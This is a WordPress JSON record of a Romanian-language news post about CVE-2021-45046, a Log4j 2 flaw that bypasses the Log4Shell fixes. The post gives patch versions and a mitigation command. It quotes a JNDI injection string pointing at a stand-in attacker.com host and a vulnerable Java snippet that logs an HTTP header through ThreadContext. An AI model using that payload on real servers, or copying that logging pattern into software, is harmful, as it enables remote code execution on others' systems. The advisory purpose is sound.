{"id":102619,"date":"2021-12-15T09:36:53","date_gmt":"2021-12-15T07:36:55","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/novyj-variant-ataki-na-log4j-2-pozvolyayushhij-obojti-dobavlennuyu-zashhitu"},"modified":"2021-12-15T09:36:53","modified_gmt":"2021-12-15T07:36:55","slug":"novyj-variant-ataki-na-log4j-2-pozvolyayushhij-obojti-dobavlennuyu-zashhitu","status":"publish","type":"post","link":"https:\/\/prohoster.info\/ro\/blog\/news\/novyj-variant-ataki-na-log4j-2-pozvolyayushhij-obojti-dobavlennuyu-zashhitu","title":{"rendered":"Noua variant\u0103 de atac asupra Log4j 2, care permite ocolirea protec\u021biei ad\u0103ugate","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>O nou\u0103 vulnerabilitate (CVE-2021-45046) a fost descoperit\u0103 \u00een implementarea substitu\u021biilor JNDI din biblioteca Log4j 2, care apare \u00een ciuda corec\u021biilor incluse \u00een versiunea 2.15 \u0219i indiferent de utilizarea set\u0103rii [log4j2.noFormatMsgLookup] pentru protec\u021bie. Problema reprezint\u0103 un pericol \u00een special pentru versiunile vechi ale Log4j 2, protejate cu ajutorul flag-ului [noFormatMsgLookup], deoarece permite ocolirea protec\u021biei de la vulnerabilitatea anterioar\u0103 (Log4Shell, CVE-2021-44228), permi\u021b\u00e2nd executarea codului pe server. Pentru utilizatorii versiunii 2.15, exploatarea este limitat\u0103 la crearea de condi\u021bii pentru \u00eenchiderea brusc\u0103 a aplica\u021biei din cauza epuiz\u0103rii resurselor disponibile.     <\/p>\n<p>Vulnerabilitatea se manifest\u0103 doar pe sistemele care utilizeaz\u0103 cereri de context (Context Lookup) \u00een jurnalizare, cum ar fi ${ctx:loginId}, sau \u0219abloane MDC (Thread Context Map), de exemplu, %X, %mdc \u0219i %MDC. Exploatarea const\u0103 \u00een crearea de condi\u021bii pentru a imprima \u00een jurnal date care con\u021bin substitu\u021bii JNDI, atunci c\u00e2nd se utilizeaz\u0103 \u00een aplica\u021bie cereri de context sau \u0219abloane MDC, care definesc regulile de format pentru ie\u0219irea \u00een jurnal.     <\/p>\n<p>Cercet\u0103torii de la LunaSec au remarcat c\u0103 pentru versiunile de Log4j mai mici de 2.15, aceast\u0103 vulnerabilitate poate fi utilizat\u0103 ca un nou vector de atac pentru Log4Shell, duc\u00e2nd la executarea de cod, dac\u0103 \u00een log-uri sunt folosite expresii ThreadContext care con\u021bin date externe, indiferent de activarea flag-ului [noMsgFormatLookups] sau de modelul [%m{nolookups}].     <center><img decoding=\"async\" alt=\"Noua variant\u0103 de atac asupra Log4j 2, care permite ocolirea protec\u021biei ad\u0103ugate\" src=\"\/wp-content\/uploads\/2021\/12\/abd6f205102d584b2f633fa8188bdd67.jpg\" style=\"display:block;margin: 0 auto;\" \/><\/center>        <\/p>\n<p>Ocolirea protec\u021biei const\u0103 \u00een faptul c\u0103 \u00een loc de substitu\u021bia direct\u0103 [${jndi:ldap:\/\/attacker.com\/a}], aceast\u0103 expresie este introdus\u0103 prin intermediul unei variabile intermediare utilizate \u00een regulile de format al log-urilor. De exemplu, dac\u0103 \u00een log-uri este folosit\u0103 o cerere contextul ${ctx:apiversion}, atacul poate fi realizat prin \u00eenlocuirea datelor [${jndi:ldap:\/\/attacker.com\/a}] \u00een valoarea atribuit\u0103 variabilei apiversion. Exemplu de cod vulnerabil:         appender.console.layout.pattern = ${ctx:apiversion} \u2014 %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L \u2014 %m%n       @GetMapping('\/api')     public String index(@RequestHeader('X-Api-Version') String apiVersion) {           \/\/ Valoarea antetului HTTP 'X-Api-Version' este trecut\u0103 \u00een ThreadContext         ThreadContext.put('apiversion', apiVersion);           \/\/ La generarea log-ului, valoarea extern\u0103 apiversion va fi procesat\u0103 prin substitu\u021bia ${ctx:apiversion}         logger.info('Received a request for API version');         return 'Hello, world!';     }      <\/p>\n<p>\u00cen versiunea Log4j 2.15, vulnerabilitatea poate fi utilizat\u0103 pentru a efectua atacuri DoS prin transmiterea \u00een ThreadContext a valorilor care duc la cicluri infinite \u00een procesarea modelului de formatare a ie\u0219irii.  <center><img decoding=\"async\" alt=\"Noua variant\u0103 de atac asupra Log4j 2, care permite ocolirea protec\u021biei ad\u0103ugate\" src=\"\/wp-content\/uploads\/2021\/12\/5de7e9d9db53c53f5ebeed3bce6743c4.jpg\" style=\"display:block;margin: 0 auto;\" \/><\/center>        <\/p>\n<p>Pentru a bloca vulnerabilitatea, au fost publicate actualiz\u0103rile 2.16 \u0219i 2.12.2. \u00cen ramura Log4j 2.16, pe l\u00e2ng\u0103 corec\u021biile implementate \u00een versiunea 2.15 \u0219i legarea cererilor JNDI LDAP la &#171;localhost&#187;, func\u021bionalitatea JNDI este complet dezactivat\u0103 \u00een mod implicit \u0219i suportul pentru \u0219abloanele de \u00eenlocuire a mesajelor a fost eliminat. Ca solu\u021bie alternativ\u0103 pentru protec\u021bie, se recomand\u0103 eliminarea clasei JndiLookup din classpath (de exemplu, &#171;zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class&#187;).     <\/p>\n<p>Urm\u0103rirea apari\u021biei corec\u021biilor \u00een pachete poate fi f\u0103cut\u0103 pe paginile distribu\u021biilor (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) \u0219i ale produc\u0103torilor de platforme Java (GitHub, Docker, Oracle, vmWare, Broadcom \u0219i Amazon\/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure etc.).<br \/>\n<br \/>Sursa: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=56347\">opennet.ro<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u043a JNDI \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Log4j 2 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0451 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2021-45046), \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432 \u0432\u044b\u043f\u0443\u0441\u043a 2.15 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 &#171;log4j2.noFormatMsgLookup&#187; \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0434\u043b\u044f \u0441\u0442\u0430\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 Log4j 2, \u0437\u0430\u0449\u0438\u0449\u0451\u043d\u043d\u044b\u0445 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0444\u043b\u0430\u0433\u0430 &#171;noFormatMsgLookup&#187;, \u0442\u0430\u043a \u043a\u0430\u043a \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u0431\u043e\u0439\u0442\u0438 \u0437\u0430\u0449\u0438\u0442\u0443 \u043e\u0442 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u0443\u0437\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (Log4Shell, CVE-2021-44228), [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":102620,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-102619","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u043a JNDI \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Log4j 2 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0451 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2021-45046), \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432 \u0432\u044b\u043f\u0443\u0441\u043a 2.15 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/ro\/blog\/news\/novyj-variant-ataki-na-log4j-2-pozvolyayushhij-obojti-dobavlennuyu-zashhitu\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"ro_RO\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041d\u043e\u0432\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 Log4j 2, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043e\u0431\u043e\u0439\u0442\u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0437\u0430\u0449\u0438\u0442\u0443 | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u043a JNDI \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Log4j 2 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0451 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2021-45046), \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432 \u0432\u044b\u043f\u0443\u0441\u043a 2.15 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/ro\/blog\/news\/novyj-variant-ataki-na-log4j-2-pozvolyayushhij-obojti-dobavlennuyu-zashhitu\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-12-15T07:36:55+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2021-12-15T07:36:55+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47O nou\u0103 variant\u0103 de atac asupra Log4j 2, care permite ocolirea protec\u021biei ad\u0103ugate | ProHoster","description":"\u00cen implementarea substitu\u021biilor JNDI \u00een biblioteca Log4j 2 a fost identificat\u0103 o alt\u0103 vulnerabilitate (CVE-2021-45046), care se manifest\u0103 \u00een ciuda corecturilor ad\u0103ugate \u00een versiunea 2.15 \u0219i indiferent de utilizarea set\u0103rii.","canonical_url":"https:\/\/prohoster.info\/ro\/blog\/news\/novyj-variant-ataki-na-log4j-2-pozvolyayushhij-obojti-dobavlennuyu-zashhitu","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"ro_RO","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041d\u043e\u0432\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 Log4j 2, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043e\u0431\u043e\u0439\u0442\u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0437\u0430\u0449\u0438\u0442\u0443 | ProHoster","og:description":"\u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u043a JNDI \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Log4j 2 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0451 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2021-45046), \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432 \u0432\u044b\u043f\u0443\u0441\u043a 2.15 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438.","og:url":"https:\/\/prohoster.info\/ro\/blog\/news\/novyj-variant-ataki-na-log4j-2-pozvolyayushhij-obojti-dobavlennuyu-zashhitu","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-12-15T07:36:55+00:00","article:modified_time":"2021-12-15T07:36:55+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"102619","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-12-15 07:37:04","updated":"2022-09-29 16:05:40","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts\/102619","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/comments?post=102619"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/posts\/102619\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/media\/102620"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/media?parent=102619"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/categories?post=102619"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/ro\/wp-json\/wp\/v2\/tags?post=102619"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}